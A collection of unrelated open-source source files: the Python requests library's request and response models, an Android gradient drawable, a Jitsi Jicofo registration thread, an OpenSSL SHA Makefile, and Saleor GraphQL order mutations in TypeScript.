if isinstance(v, (tuple, list)):
if len(v) == 2:
fn, fp = v
elif len(v) == 3:
fn, fp, ft = v
else:
fn, fp, ft, fh = v
else:
fn = guess_filename(v) or k
fp = v
if isinstance(fp, (str, bytes, bytearray)):
fdata = fp
else:
fdata = fp.read()
rf = RequestField(name=k, data=fdata, filename=fn, headers=fh)
rf.make_multipart(content_type=ft)
new_fields.append(rf)
body, content_type = encode_multipart_formdata(new_fields)
return body, content_type
class RequestHooksMixin(object):
def register_hook(self, event, hook):
"""Properly register a hook."""
if event not in self.hooks:
raise ValueError('Unsupported event specified, with event name "%s"' % (event))
if isinstance(hook, collections.Callable):
self.hooks[event].append(hook)
elif hasattr(hook, '__iter__'):
self.hooks[event].extend(h for h in hook if isinstance(h, collections.Callable))
def deregister_hook(self, event, hook):
"""Deregister a previously registered hook.
Returns True if the hook existed, False if not.
"""
try:
self.hooks[event].remove(hook)
return True
except ValueError:
return False
class Request(RequestHooksMixin):
"""A user-created :class:`Request <Request>` object.
Used to prepare a :class:`PreparedRequest <PreparedRequest>`, which is sent to the server.
:param method: HTTP method to use.
:param url: URL to send.
:param headers: dictionary of headers to send.
:param files: dictionary of {filename: fileobject} files to multipart upload.
:param data: the body to attach to the request. If a dictionary is provided, form-encoding will take place.
:param json: json for the body to attach to the request (if data is not specified).
:param params: dictionary of URL parameters to append to the URL.
:param auth: Auth handler or (user, pass) tuple.
:param cookies: dictionary or CookieJar of cookies to attach to this request.
:param hooks: dictionary of callback hooks, for internal usage.
Usage::
>>> import requests
>>> req = requests.Request('GET', 'http://httpbin.org/get')
>>> req.prepare()
<PreparedRequest [GET]>
"""
def __init__(self, method=None, url=None, headers=None, files=None,
data=None, params=None, auth=None, cookies=None, hooks=None, json=None):
# Default empty dicts for dict params.
data = [] if data is None else data
files = [] if files is None else files
headers = {} if headers is None else headers
params = {} if params is None else params
hooks = {} if hooks is None else hooks
self.hooks = default_hooks()
for (k, v) in list(hooks.items()):
self.register_hook(event=k, hook=v)
self.method = method
self.url = url
self.headers = headers
self.files = files
self.data = data
self.json = json
self.params = params
self.auth = auth
self.cookies = cookies
def __repr__(self):
return '<Request [%s]>' % (self.method)
def prepare(self):
"""Constructs a :class:`PreparedRequest <PreparedRequest>` for transmission and returns it."""
p = PreparedRequest()
p.prepare(
method=self.method,
url=self.url,
headers=self.headers,
files=self.files,
data=self.data,
json=self.json,
params=self.params,
auth=self.auth,
cookies=self.cookies,
hooks=self.hooks,
)
return p
class PreparedRequest(RequestEncodingMixin, RequestHooksMixin):
"""The fully mutable :class:`PreparedRequest <PreparedRequest>` object,
containing the exact bytes that will be sent to the server.
Generated from either a :class:`Request <Request>` object or manually.
Usage::
>>> import requests
>>> req = requests.Request('GET', 'http://httpbin.org/get')
>>> r = req.prepare()
<PreparedRequest [GET]>
>>> s = requests.Session()
>>> s.send(r)
<Response [200]>
"""
def __init__(self):
#: HTTP verb to send to the server.
self.method = None
#: HTTP URL to send the request to.
self.url = None
#: dictionary of HTTP headers.
self.headers = None
# The `CookieJar` used to create the Cookie header will be stored here
# after prepare_cookies is called
self._cookies = None
#: request body to send to the server.
self.body = None
#: dictionary of callback hooks, for internal usage.
self.hooks = default_hooks()
def prepare(self, method=None, url=None, headers=None, files=None,
data=None, params=None, auth=None, cookies=None, hooks=None, json=None):
"""Prepares the entire request with the given parameters."""
self.prepare_method(method)
self.prepare_url(url, params)
self.prepare_headers(headers)
self.prepare_cookies(cookies)
self.prepare_body(data, files, json)
self.prepare_auth(auth, url)
# Note that prepare_auth must be last to enable authentication schemes
# such as OAuth to work on a fully prepared request.
# This MUST go after prepare_auth. Authenticators could add a hook
self.prepare_hooks(hooks)
def __repr__(self):
return '<PreparedRequest [%s]>' % (self.method)
def copy(self):
p = PreparedRequest()
p.method = self.method
p.url = self.url
p.headers = self.headers.copy() if self.headers is not None else None
p._cookies = _copy_cookie_jar(self._cookies)
p.body = self.body
p.hooks = self.hooks
return p
def prepare_method(self, method):
"""Prepares the given HTTP method."""
self.method = method
if self.method is not None:
self.method = self.method.upper()
def prepare_url(self, url, params):
"""Prepares the given HTTP URL."""
#: Accept objects that have string representations.
        #: We're unable to blindly call unicode/str functions
#: as this will include the bytestring indicator (b'')
#: on python 3.x.
#: https://github.com/kennethreitz/requests/pull/2238
if isinstance(url, bytes):
url = url.decode('utf8')
else:
url = unicode(url) if is_py2 else str(url)
# Don't do any URL preparation for non-HTTP schemes like `mailto`,
# `data` etc to work around exceptions from `url_parse`, which
# handles RFC 3986 only.
if ':' in url and not url.lower().startswith('http'):
self.url = url
return
# Support for unicode domain names and paths.
try:
scheme, auth, host, port, path, query, fragment = parse_url(url)
except LocationParseError as e:
raise InvalidURL(*e.args)
if not scheme:
error = ("Invalid URL {0!r}: No schema supplied. Perhaps you meant http://{0}?")
error = error.format(to_native_string(url, 'utf8'))
raise MissingSchema(error)
if not host:
raise InvalidURL("Invalid URL %r: No host supplied" % url)
# Only want to apply IDNA to the hostname
try:
host = host.encode('idna').decode('utf-8')
except UnicodeError:
raise InvalidURL('URL has an invalid label.')
# Carefully reconstruct the network location
netloc = auth or ''
if netloc:
netloc += '@'
netloc += host
if port:
netloc += ':' + str(port)
# Bare domains aren't valid URLs.
if not path:
path = '/'
if is_py2:
if isinstance(scheme, str):
scheme = scheme.encode('utf-8')
if isinstance(netloc, str):
netloc = netloc.encode('utf-8')
if isinstance(path, str):
path = path.encode('utf-8')
if isinstance(query, str):
query = query.encode('utf-8')
if isinstance(fragment, str):
fragment = fragment.encode('utf-8')
enc_params = self._encode_params(params)
if enc_params:
if query:
query = '%s&%s' % (query, enc_params)
else:
query = enc_params
url = requote_uri(urlunparse([scheme, netloc, path, None, query, fragment]))
self.url = url
def prepare_headers(self, headers):
"""Prepares the given HTTP headers."""
if headers:
self.headers = CaseInsensitiveDict((to_native_string(name), value) for name, value in headers.items())
else:
self.headers = CaseInsensitiveDict()
def prepare_body(self, data, files, json=None):
"""Prepares the given HTTP body data."""
# Check if file, fo, generator, iterator.
# If not, run through normal process.
# Nottin' on you.
body = None
content_type = None
length = None
if json is not None:
content_type = 'application/json'
body = complexjson.dumps(json)
is_stream = all([
hasattr(data, '__iter__'),
not isinstance(data, (basestring, list, tuple, dict))
])
try:
length = super_len(data)
except (TypeError, AttributeError, UnsupportedOperation):
length = None
if is_stream:
body = data
if files:
raise NotImplementedError('Streamed bodies and files are mutually exclusive.')
if length is not None:
self.headers['Content-Length'] = builtin_str(length)
else:
self.headers['Transfer-Encoding'] = 'chunked'
else:
# Multi-part file uploads.
if files:
(body, content_type) = self._encode_files(files, data)
else:
if data and json is None:
body = self._encode_params(data)
if isinstance(data, basestring) or hasattr(data, 'read'):
content_type = None
else:
content_type = 'application/x-www-form-urlencoded'
self.prepare_content_length(body)
# Add content-type if it wasn't explicitly provided.
if content_type and ('content-type' not in self.headers):
self.headers['Content-Type'] = content_type
self.body = body
def prepare_content_length(self, body):
if hasattr(body, 'seek') and hasattr(body, 'tell'):
body.seek(0, 2)
self.headers['Content-Length'] = builtin_str(body.tell())
body.seek(0, 0)
elif body is not None:
l = super_len(body)
if l:
self.headers['Content-Length'] = builtin_str(l)
elif (self.method not in ('GET', 'HEAD')) and (self.headers.get('Content-Length') is None):
self.headers['Content-Length'] = '0'
def prepare_auth(self, auth, url=''):
"""Prepares the given HTTP auth data."""
# If no Auth is explicitly provided, extract it from the URL first.
if auth is None:
url_auth = get_auth_from_url(self.url)
auth = url_auth if any(url_auth) else None
if auth:
if isinstance(auth, tuple) and len(auth) == 2:
# special-case basic HTTP auth
auth = HTTPBasicAuth(*auth)
# Allow auth to make its changes.
r = auth(self)
# Update self to reflect the auth changes.
self.__dict__.update(r.__dict__)
# Recompute Content-Length
self.prepare_content_length(self.body)
def prepare_cookies(self, cookies):
"""Prepares the given HTTP cookie data.
This function eventually generates a ``Cookie`` header from the
given cookies using cookielib. Due to cookielib's design, the header
will not be regenerated if it already exists, meaning this function
can only be called once for the life of the
:class:`PreparedRequest <PreparedRequest>` object. Any subsequent calls
to ``prepare_cookies`` will have no actual effect, unless the "Cookie"
header is removed beforehand."""
if isinstance(cookies, cookielib.CookieJar):
self._cookies = cookies
else:
self._cookies = cookiejar_from_dict(cookies)
cookie_header = get_cookie_header(self._cookies, self)
if cookie_header is not None:
self.headers['Cookie'] = cookie_header
def prepare_hooks(self, hooks):
"""Prepares the given hooks."""
# hooks can be passed as None to the prepare method and to this
# method. To prevent iterating over None, simply use an empty list
# if hooks is False-y
hooks = hooks or []
for event in hooks:
self.register_hook(event, hooks[event])
class Response(object):
"""The :class:`Response <Response>` object, which contains a
server's response to an HTTP request.
"""
__attrs__ = [
'_content', 'status_code', 'headers', 'url', 'history',
'encoding', 'reason', 'cookies', 'elapsed', 'request'
]
def __init__(self):
super(Response, self).__init__()
self._content = False
self._content_consumed = False
#: Integer Code of responded HTTP Status, e.g. 404 or 200.
self.status_code = None
#: Case-insensitive Dictionary of Response Headers.
#: For example, ``headers['content-encoding']`` will return the
#: value of a ``'Content-Encoding'`` response header.
self.headers = CaseInsensitiveDict()
#: File-like object representation of response (for advanced usage).
#: Use of ``raw`` requires that ``stream=True`` be set on the request.
# This requirement does not apply for use internally to Requests.
self.raw = None
#: Final URL location of Response.
self.url = None
#: Encoding to decode with when accessing r.text.
self.encoding = None
#: A list of :class:`Response <Response>` objects from
#: the history of the Request. Any redirect responses will end
#: up here. The list is sorted from the oldest to the most recent request.
self.history = []
#: Textual reason of responded HTTP Status, e.g. "Not Found" or "OK".
self.reason = None
#: A CookieJar of Cookies the server sent back.
self.cookies = cookiejar_from_dict({})
#: The amount of time elapsed between sending the request
#: and the arrival of the response (as a timedelta).
#: This property specifically measures the time taken between sending
#: the first byte of the request and finishing parsing the headers. It
#: is therefore unaffected by consuming the response content or the
#: value of the ``stream`` keyword argument.
self.elapsed = datetime.timedelta(0)
#: The :class:`PreparedRequest <PreparedRequest>` object to which this
#: is a response.
self.request = None
def __getstate__(self):
# Consume everything; accessing the content attribute makes
# sure the content has been fully read.
if not self._content_consumed:
self.content
return dict(
(attr, getattr(self, attr, None))
for attr in self.__attrs__
)
def __setstate__(self, state):
for name, value in state.items():
setattr(self, name, value)
# pickled objects do not have .raw
setattr(self, '_content_consumed', True)
setattr(self, 'raw', None)
def __repr__(self):
return '<Response [%s]>' % (self.status_code)
def __bool__(self):
"""Returns true if :attr:`status_code` is 'OK'."""
return self.ok
def __nonzero__(self):
"""Returns true if :attr:`status_code` is 'OK'."""
return self.ok
def __iter__(self):
"""Allows you to use a response as an iterator."""
return self.iter_content(128)
@property
def ok(self):
try:
self.raise_for_status()
except HTTPError:
return False
return True
@property
def is_redirect(self):
"""True if this Response is a well-formed HTTP redirect that could have
been processed automatically (by :meth:`Session.resolve_redirects`).
"""
return ('location' in self.headers and self.status_code in REDIRECT_STATI)
@property
def is_permanent_redirect(self):
"""True if this Response one of the permanant versions of redirect"""
return ('location' in self.headers and self.status_code in (codes.moved_permanently, codes.permanent_redirect))
@property
def apparent_encoding(self):
"""The apparent encoding, provided by the chardet library"""
return chardet.detect(self.content)['encoding']
def iter_content(self, chunk_size=1, decode_unicode=False):
"""Iterates over the response data. When stream=True is set on the
request, this avoids reading the content at once into memory for
large responses. The chunk size is the number of bytes it should
read into memory. This is not necessarily the length of each item
returned as decoding can take place.
If decode_unicode is True, content will be decoded using the best
available encoding based on the response.
"""
def generate():
# Special case for urllib3.
if hasattr(self.raw, 'stream'):
try:
for chunk in self.raw.stream(chunk_size, decode_content=True):
yield chunk
except ProtocolError as e:
raise ChunkedEncodingError(e)
except DecodeError as e:
raise ContentDecodingError(e)
except ReadTimeoutError as e:
raise ConnectionError(e)
else:
# Standard file-like object.
while True:
chunk = self.raw.read(chunk_size)
if not chunk:
break
yield chunk
self._content_consumed = True
if self._content_consumed and isinstance(self._content, bool):
raise StreamConsumedError()
# simulate reading small chunks of the content
reused_chunks = iter_slices(self._content, chunk_size)
stream_chunks = generate()
chunks = reused_chunks if self._content_consumed else stream_chunks
if decode_unicode:
chunks = stream_decode_response_unicode(chunks, self)
return chunks
def iter_lines(self, chunk_size=ITER_CHUNK_SIZE, decode_unicode=None, delimiter=None):
"""Iterates over the response data, one line at a time. When
stream=True is set on the request, this avoids reading the
content at once into memory for large responses.
        .. note:: This method is not reentrant-safe.
"""
pending = None
for chunk in self.iter_content(chunk_size=chunk_size, decode_unicode=decode_unicode):
if pending is not None:
chunk = pending + chunk
if delimiter:
lines = chunk.split(delimiter)
else:
lines = chunk.splitlines()
if lines and lines[-1] and chunk and lines[-1][-1] == chunk[-1]:
pending = lines.pop()
else:
pending = None
for line in lines:
yield line
if pending is not None:
yield pending
@property
def content(self):
"""Content of the response, in bytes."""
if self._content is False:
# Read the contents.
try:
if self._content_consumed:
raise RuntimeError(
'The content for this response was already consumed')
if self.status_code == 0:
self._content = None
else:
self._content = bytes().join(self.iter_content(CONTENT_CHUNK_SIZE)) or bytes()
except AttributeError:
self._content = None
self._content_consumed = True
# don't need to release the connection; that's been handled by urllib3
# since we exhausted the data.
return self._content
@property
def text(self):
"""Content of the response, in unicode.
If Response.encoding is None, encoding will be guessed using
``chardet``.
The encoding of the response content is determined based solely on HTTP
headers, following RFC 2616 to the letter. If you can take advantage of
non-HTTP knowledge to make a better guess at the encoding, you should
set ``r.encoding`` appropriately before accessing this property.
"""
# Try charset from content-type
content = None
encoding = self.encoding
if not self.content:
return str('')
# Fallback to auto-detected encoding.
if self.encoding is None:
encoding = self.apparent_encoding
# Decode unicode from given encoding.
try:
content = str(self.content, encoding, errors='replace')
except (LookupError, TypeError):
# A LookupError is raised if the encoding was not found which could
# indicate a misspelling or similar mistake.
#
# A TypeError can be raised if encoding is None
#
# So we try blindly encoding.
content = str(self.content, errors='replace')
return content
def json(self, **kwargs):
"""Returns the json-encoded content of a response, if any.
:param \*\*kwargs: Optional arguments that ``json.loads`` takes.
"""
if not self.encoding and len(self.content) > 3:
# No encoding set. JSON RFC 4627 section 3 states we should expect
# UTF-8, -16 or -32. Detect which one to use; If the detection or
# decoding fails, fall back to `self.text` (using chardet to make
# a best guess).
encoding = guess_json_utf(self.content)
if encoding is not None:
try:
return complexjson.loads(
self.content.decode(encoding), **kwargs
)
except UnicodeDecodeError:
# Wrong UTF codec detected; usually because it's not UTF-8
# but some other 8-bit codec. This is an RFC violation,
# and the server didn't bother to tell us what codec *was*
# used.
pass
return complexjson.loads(self.text, **kwargs)
@property
def links(self):
"""Returns the parsed header links of the response, if any."""
header = self.headers.get('link')
# l = MultiDict()
l = {}
if header:
links = parse_header_links(header)
for link in links:
key = link.get('rel') or link.get('url')
l[key] = link
return l
def raise_for_status(self):
"""Raises stored :class:`HTTPError`, if one occurred."""
http_error_msg = ''
if 400 <= self.status_code < 500:
http_error_msg = '%s Client Error: %s for url: %s' % (self.status_code, self.reason, self.url)
elif 500 <= self.status_code < 600:
http_error_msg = '%s Server Error: %s for url: %s' % (self.status_code, self.reason, self.url)
if http_error_msg:
raise HTTPError(http_error_msg, response=self)
def close(self):
"""Releases the connection back to the pool. Once this method has been
called the underlying ``raw`` object must not be accessed again.
*Note: Should not normally need to be called explicitly.*
"""
if not self._content_consumed:
return self.raw.close()
return self.raw.release_conn()
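# --- Illustrative usage sketch (not part of the original module) -------------
# A minimal example of how the Response API documented above is typically
# consumed. `resp` is assumed to be a Response obtained elsewhere (e.g. from a
# Session); this helper is only a sketch, not library code.
def _example_consume_response(resp, as_json=False):
    # Raise HTTPError for 4xx/5xx statuses (see raise_for_status above).
    resp.raise_for_status()
    if as_json:
        # Decodes the body, guessing the UTF codec per RFC 4627 if needed.
        return resp.json()
    lines = []
    # Stream the body lazily; note the content can only be consumed once,
    # so don't mix this with .content/.text/.json() on the same response.
    for line in resp.iter_lines(chunk_size=512):
        if line:
            lines.append(line)
    return lines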
| {
"pile_set_name": "Github"
} |
<shape xmlns:android="http://schemas.android.com/apk/res/android"
android:shape="rectangle">
<gradient
android:angle="0"
android:endColor="#fe6446"
android:startColor="#fe9150"
android:type="linear" />
</shape>
| {
"pile_set_name": "Github"
} |
/*
* Jicofo, the Jitsi Conference Focus.
*
* Copyright @ 2015 Atlassian Pty Ltd
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jitsi.jicofo.util;
import net.java.sip.communicator.service.protocol.*;
import org.jitsi.utils.logging.*;
/**
* Thread does the job of registering given <tt>ProtocolProviderService</tt>.
*
* @author Pawel Domas
*/
public class RegisterThread
extends Thread
{
/**
* The logger.
*/
private final static Logger logger
= Logger.getLogger(RegisterThread.class);
private final ProtocolProviderService pps;
public RegisterThread(ProtocolProviderService pps)
{
this.pps = pps;
}
@Override
public void run()
{
try
{
pps.register(new ServerSecurityAuthority());
}
catch (OperationFailedException e)
{
logger.error(e, e);
}
}
}
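// --- Illustrative usage sketch (not part of the original class) -------------
// The thread is intended to be fire-and-forget: a caller holding a
// ProtocolProviderService (assumed here to be `pps`) would typically just do
//
//     new RegisterThread(pps).start();
//
// Registration failures are logged inside run() rather than propagated.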
| {
"pile_set_name": "Github"
} |
#
# OpenSSL/crypto/sha/Makefile
#
DIR= sha
TOP= ../..
CC= cc
CPP= $(CC) -E
INCLUDES=
CFLAG=-g
MAKEFILE= Makefile
AR= ar r
SHA1_ASM_OBJ=
CFLAGS= $(INCLUDES) $(CFLAG)
ASFLAGS= $(INCLUDES) $(ASFLAG)
AFLAGS= $(ASFLAGS)
GENERAL=Makefile
TEST=shatest.c sha1test.c sha256t.c sha512t.c
APPS=
LIB=$(TOP)/libcrypto.a
LIBSRC=sha_dgst.c sha1dgst.c sha_one.c sha1_one.c sha256.c sha512.c
LIBOBJ=sha_dgst.o sha1dgst.o sha_one.o sha1_one.o sha256.o sha512.o $(SHA1_ASM_OBJ)
SRC= $(LIBSRC)
EXHEADER= sha.h
HEADER= sha_locl.h $(EXHEADER)
ALL= $(GENERAL) $(SRC) $(HEADER)
top:
(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
all: lib
lib: $(LIBOBJ)
$(AR) $(LIB) $(LIBOBJ)
$(RANLIB) $(LIB) || echo Never mind.
@touch lib
sha1-586.s: asm/sha1-586.pl ../perlasm/x86asm.pl
$(PERL) asm/sha1-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
sha256-586.s: asm/sha256-586.pl ../perlasm/x86asm.pl
$(PERL) asm/sha256-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
sha512-586.s: asm/sha512-586.pl ../perlasm/x86asm.pl
$(PERL) asm/sha512-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
sha1-ia64.s: asm/sha1-ia64.pl
(cd asm; $(PERL) sha1-ia64.pl ../$@ $(CFLAGS))
sha256-ia64.s: asm/sha512-ia64.pl
(cd asm; $(PERL) sha512-ia64.pl ../$@ $(CFLAGS))
sha512-ia64.s: asm/sha512-ia64.pl
(cd asm; $(PERL) sha512-ia64.pl ../$@ $(CFLAGS))
sha256-armv4.S: asm/sha256-armv4.pl
$(PERL) $< $(PERLASM_SCHEME) $@
sha1-alpha.s: asm/sha1-alpha.pl
	(preproc=$$$$.$@.S; trap "rm $$preproc" INT; \
$(PERL) asm/sha1-alpha.pl > $$preproc && \
$(CC) -E -P $$preproc > $@ && rm $$preproc)
# Solaris make has to be explicitly told
sha1-x86_64.s: asm/sha1-x86_64.pl; $(PERL) asm/sha1-x86_64.pl $(PERLASM_SCHEME) > $@
sha1-mb-x86_64.s: asm/sha1-mb-x86_64.pl; $(PERL) asm/sha1-mb-x86_64.pl $(PERLASM_SCHEME) > $@
sha256-x86_64.s:asm/sha512-x86_64.pl; $(PERL) asm/sha512-x86_64.pl $(PERLASM_SCHEME) $@
sha256-mb-x86_64.s: asm/sha256-mb-x86_64.pl; $(PERL) asm/sha256-mb-x86_64.pl $(PERLASM_SCHEME) > $@
sha512-x86_64.s:asm/sha512-x86_64.pl; $(PERL) asm/sha512-x86_64.pl $(PERLASM_SCHEME) $@
sha1-sparcv9.S: asm/sha1-sparcv9.pl; $(PERL) asm/sha1-sparcv9.pl $@ $(CFLAGS)
sha256-sparcv9.S:asm/sha512-sparcv9.pl; $(PERL) asm/sha512-sparcv9.pl $@ $(CFLAGS)
sha512-sparcv9.S:asm/sha512-sparcv9.pl; $(PERL) asm/sha512-sparcv9.pl $@ $(CFLAGS)
sha1-ppc.s: asm/sha1-ppc.pl; $(PERL) asm/sha1-ppc.pl $(PERLASM_SCHEME) $@
sha256-ppc.s: asm/sha512-ppc.pl; $(PERL) asm/sha512-ppc.pl $(PERLASM_SCHEME) $@
sha512-ppc.s: asm/sha512-ppc.pl; $(PERL) asm/sha512-ppc.pl $(PERLASM_SCHEME) $@
sha256p8-ppc.s: asm/sha512p8-ppc.pl; $(PERL) asm/sha512p8-ppc.pl $(PERLASM_SCHEME) $@
sha512p8-ppc.s: asm/sha512p8-ppc.pl; $(PERL) asm/sha512p8-ppc.pl $(PERLASM_SCHEME) $@
sha1-parisc.s: asm/sha1-parisc.pl; $(PERL) asm/sha1-parisc.pl $(PERLASM_SCHEME) $@
sha256-parisc.s:asm/sha512-parisc.pl; $(PERL) asm/sha512-parisc.pl $(PERLASM_SCHEME) $@
sha512-parisc.s:asm/sha512-parisc.pl; $(PERL) asm/sha512-parisc.pl $(PERLASM_SCHEME) $@
sha1-mips.S: asm/sha1-mips.pl; $(PERL) asm/sha1-mips.pl $(PERLASM_SCHEME) $@
sha256-mips.S: asm/sha512-mips.pl; $(PERL) asm/sha512-mips.pl $(PERLASM_SCHEME) $@
sha512-mips.S: asm/sha512-mips.pl; $(PERL) asm/sha512-mips.pl $(PERLASM_SCHEME) $@
# GNU make "catch all"
sha1-%.S: asm/sha1-%.pl; $(PERL) $< $(PERLASM_SCHEME) $@
sha256-%.S: asm/sha512-%.pl; $(PERL) $< $(PERLASM_SCHEME) $@
sha512-%.S: asm/sha512-%.pl; $(PERL) $< $(PERLASM_SCHEME) $@
sha1-armv4-large.o: sha1-armv4-large.S
sha256-armv4.o: sha256-armv4.S
sha512-armv4.o: sha512-armv4.S
sha1-armv8.o: sha1-armv8.S
sha256-armv8.o: sha256-armv8.S
sha512-armv8.o: sha512-armv8.S
files:
$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
links:
@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
install:
@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
do \
(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
done;
tags:
ctags $(SRC)
tests:
lint:
lint -DLINT $(INCLUDES) $(SRC)>fluff
update: depend
depend:
@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
dclean:
$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
mv -f Makefile.new $(MAKEFILE)
clean:
rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
# DO NOT DELETE THIS LINE -- make depend depends on it.
sha1_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
sha1_one.o: ../../include/openssl/opensslconf.h
sha1_one.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
sha1_one.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
sha1_one.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
sha1_one.o: sha1_one.c
sha1dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
sha1dgst.o: ../../include/openssl/opensslconf.h
sha1dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
sha1dgst.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
sha1dgst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
sha1dgst.o: ../md32_common.h sha1dgst.c sha_locl.h
sha256.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
sha256.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
sha256.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
sha256.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
sha256.o: ../../include/openssl/symhacks.h ../md32_common.h sha256.c
sha512.o: ../../e_os.h ../../include/openssl/bio.h
sha512.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
sha512.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
sha512.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
sha512.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
sha512.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
sha512.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
sha512.o: ../cryptlib.h sha512.c
sha_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
sha_dgst.o: ../../include/openssl/opensslconf.h
sha_dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
sha_dgst.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
sha_dgst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
sha_dgst.o: ../md32_common.h sha_dgst.c sha_locl.h
sha_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
sha_one.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
sha_one.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
sha_one.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
sha_one.o: ../../include/openssl/symhacks.h sha_one.c
| {
"pile_set_name": "Github"
} |
import {
invoiceErrorFragment,
orderErrorFragment
} from "@saleor/fragments/errors";
import {
fragmentOrderDetails,
fragmentOrderEvent,
invoiceFragment
} from "@saleor/fragments/orders";
import makeMutation from "@saleor/hooks/makeMutation";
import gql from "graphql-tag";
import { TypedMutation } from "../mutations";
import { FulfillOrder, FulfillOrderVariables } from "./types/FulfillOrder";
import {
InvoiceEmailSend,
InvoiceEmailSendVariables
} from "./types/InvoiceEmailSend";
import {
InvoiceRequest,
InvoiceRequestVariables
} from "./types/InvoiceRequest";
import { OrderAddNote, OrderAddNoteVariables } from "./types/OrderAddNote";
import { OrderCancel, OrderCancelVariables } from "./types/OrderCancel";
import { OrderCapture, OrderCaptureVariables } from "./types/OrderCapture";
import {
OrderDraftBulkCancel,
OrderDraftBulkCancelVariables
} from "./types/OrderDraftBulkCancel";
import {
OrderDraftCancel,
OrderDraftCancelVariables
} from "./types/OrderDraftCancel";
import { OrderDraftCreate } from "./types/OrderDraftCreate";
import {
OrderDraftFinalize,
OrderDraftFinalizeVariables
} from "./types/OrderDraftFinalize";
import {
OrderDraftUpdate,
OrderDraftUpdateVariables
} from "./types/OrderDraftUpdate";
import {
OrderFulfillmentCancel,
OrderFulfillmentCancelVariables
} from "./types/OrderFulfillmentCancel";
import {
OrderFulfillmentUpdateTracking,
OrderFulfillmentUpdateTrackingVariables
} from "./types/OrderFulfillmentUpdateTracking";
import {
OrderLineDelete,
OrderLineDeleteVariables
} from "./types/OrderLineDelete";
import { OrderLinesAdd, OrderLinesAddVariables } from "./types/OrderLinesAdd";
import {
OrderLineUpdate,
OrderLineUpdateVariables
} from "./types/OrderLineUpdate";
import {
OrderMarkAsPaid,
OrderMarkAsPaidVariables
} from "./types/OrderMarkAsPaid";
import { OrderRefund, OrderRefundVariables } from "./types/OrderRefund";
import {
OrderShippingMethodUpdate,
OrderShippingMethodUpdateVariables
} from "./types/OrderShippingMethodUpdate";
import { OrderUpdate, OrderUpdateVariables } from "./types/OrderUpdate";
import { OrderVoid, OrderVoidVariables } from "./types/OrderVoid";
const orderCancelMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderCancel($id: ID!) {
orderCancel(id: $id) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderCancelMutation = TypedMutation<
OrderCancel,
OrderCancelVariables
>(orderCancelMutation);
const orderDraftCancelMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderDraftCancel($id: ID!) {
draftOrderDelete(id: $id) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderDraftCancelMutation = TypedMutation<
OrderDraftCancel,
OrderDraftCancelVariables
>(orderDraftCancelMutation);
const orderDraftBulkCancelMutation = gql`
${orderErrorFragment}
mutation OrderDraftBulkCancel($ids: [ID]!) {
draftOrderBulkDelete(ids: $ids) {
errors: orderErrors {
...OrderErrorFragment
}
}
}
`;
export const TypedOrderDraftBulkCancelMutation = TypedMutation<
OrderDraftBulkCancel,
OrderDraftBulkCancelVariables
>(orderDraftBulkCancelMutation);
const orderDraftFinalizeMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderDraftFinalize($id: ID!) {
draftOrderComplete(id: $id) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
